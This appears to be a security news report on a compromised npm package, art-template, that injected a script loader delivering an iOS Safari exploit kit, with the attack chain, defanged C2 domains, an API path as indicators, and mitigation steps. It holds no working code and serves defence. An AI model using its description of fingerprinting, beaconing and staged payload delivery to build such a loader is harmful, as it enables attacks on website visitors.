Security researchers have uncovered a sophisticated supply chain attack against art-template, one of the most widely used JavaScript templating libraries in the npm ecosystem. The compromised package was weaponized to silently deliver a full iOS browser exploit kit to every visitor of any web application that included the affected versions — turning thousands of legitimate websites into stealthy watering holes targeting Apple device users.
The attack was discovered and documented by researchers at Socket.dev, who linked the malicious implant to a previously documented iOS exploit framework known as the Coruna exploit kit. Their analysis, titled “Coruna Respawned,” reveals the attack represents a direct reuse or near-identical derivative of that earlier framework — now delivered through npm supply chain compromise.
How the Package Was Compromised
The art-template package, originally developed and maintained by an author known as “aui,” was transferred to an unknown actor under the pretense of continuing its maintenance. The new controller almost immediately began weaponizing the package against its user base. Issue reports flagging suspicious behavior from concerned users were quietly deleted by the new maintainer in an attempt to suppress discovery while malicious versions continued to be pushed to npm.
The attack followed an escalating injection pattern across multiple package releases:
- Version 4.13.3 — Used character encoding (
String.fromCharCode) to obfuscate a loader pointing to a suspicious external domain - Versions 4.13.5 and 4.13.6 — Dropped all obfuscation and injected a plaintext script loader directly into the package’s browser bundle file (
lib/template-web.js)
Any web application that bundled versions 4.13.5 or 4.13.6 would silently load and execute the exploit kit in every visitor’s browser — with no visible sign that anything had changed in the application itself.
The iOS Browser Exploit Delivery Framework
The core of the attack is a sophisticated JavaScript implant that functions as a precision-targeted watering hole framework. Once injected through the compromised npm package, it quietly fingerprints each site visitor before deciding whether to proceed. Critically, the implant only activates on Safari running on iOS versions 11.0 through 17.2 and silently exits on Chrome, Firefox, Edge, Android, and iOS 17.3 or higher — making it nearly invisible to desktop security researchers.
The attack chain for a targeted victim proceeds as follows:
- The implant detects Safari on a vulnerable iOS version
- It begins beaconing the victim’s public IP address, iOS version string, and a campaign tracking code to a command-and-control server every ten seconds
- Five layers of anti-bot checks are run — including MathML rendering tests and a WebAssembly proof-of-work challenge — to confirm the target is a real person on real hardware
- Only after passing all checks does the framework fetch and execute the final payload from the C2 server
- Payload selection is tailored to the victim’s exact iOS version, with each of five version bands mapping to a different remote exploit module
CVE-2024-23222 Connection
The hard cutoff at iOS 17.3 is not arbitrary. It aligns precisely with the patch boundary for CVE-2024-23222, a WebKit vulnerability Apple fixed in that exact release. This precision strongly suggests the exploit kit was engineered for browser-level exploitation of a known-patched WebKit flaw — targeting the enormous installed base of devices that had not yet upgraded past iOS 17.2.
Scale of Exposure
The art-template library has accumulated tens of millions of downloads across its lifetime and is embedded in a large number of JavaScript projects globally. Any web application that bundled the affected versions became an unwitting delivery vehicle for a targeted mobile attack against its own users — with no visible change in application behavior and no indication to developers or site operators that exploitation was occurring.
The C2 infrastructure used a content-addressed module delivery system that concealed payloads from outside observers. Remote modules were fetched via URLs derived by hashing a secret session key with a module identifier, making them invisible to standard security scanners that do not know the key.
Indicators of Compromise
Security teams should immediately check for the following indicators in their environments:
- Presence of art-template versions 4.13.3, 4.13.5, or 4.13.6 in any JavaScript project
- Unexpected script loaders pointing to
v3.jiathis[.]comin bundled JavaScript files - Outbound connections to
utaq[.]cfww[.]shop(watering hole hosting) orl1ewsu3yjkqeroy[.]xyz(C2 server) - POST requests to
/api/ip-sync/syncfrom client-side JavaScript
Immediate Mitigation Steps
Developers and security teams are urged to take the following actions immediately:
- Audit dependency trees — scan all projects for art-template versions 4.13.3 through 4.13.6 and update to a clean version
- Lock dependencies — use package-lock.json and integrity checks (SHA-512 hashes) to prevent unauthorized package updates
- Inspect browser bundle outputs — review compiled JavaScript bundles for unexpected
loadScript()calls or external domain references - Monitor outbound network requests — implement CSP (Content Security Policy) headers to restrict which external domains can be loaded by your web applications
- Conduct full security reviews — any application deployed with affected versions should undergo an immediate security review and consider notifying affected users
This attack is a stark reminder that npm package maintainer transitions represent a significant supply chain risk. Security teams should monitor for ownership changes in critical dependencies and treat post-transfer package updates with elevated scrutiny.
Source: Cyber Security News, May 22, 2026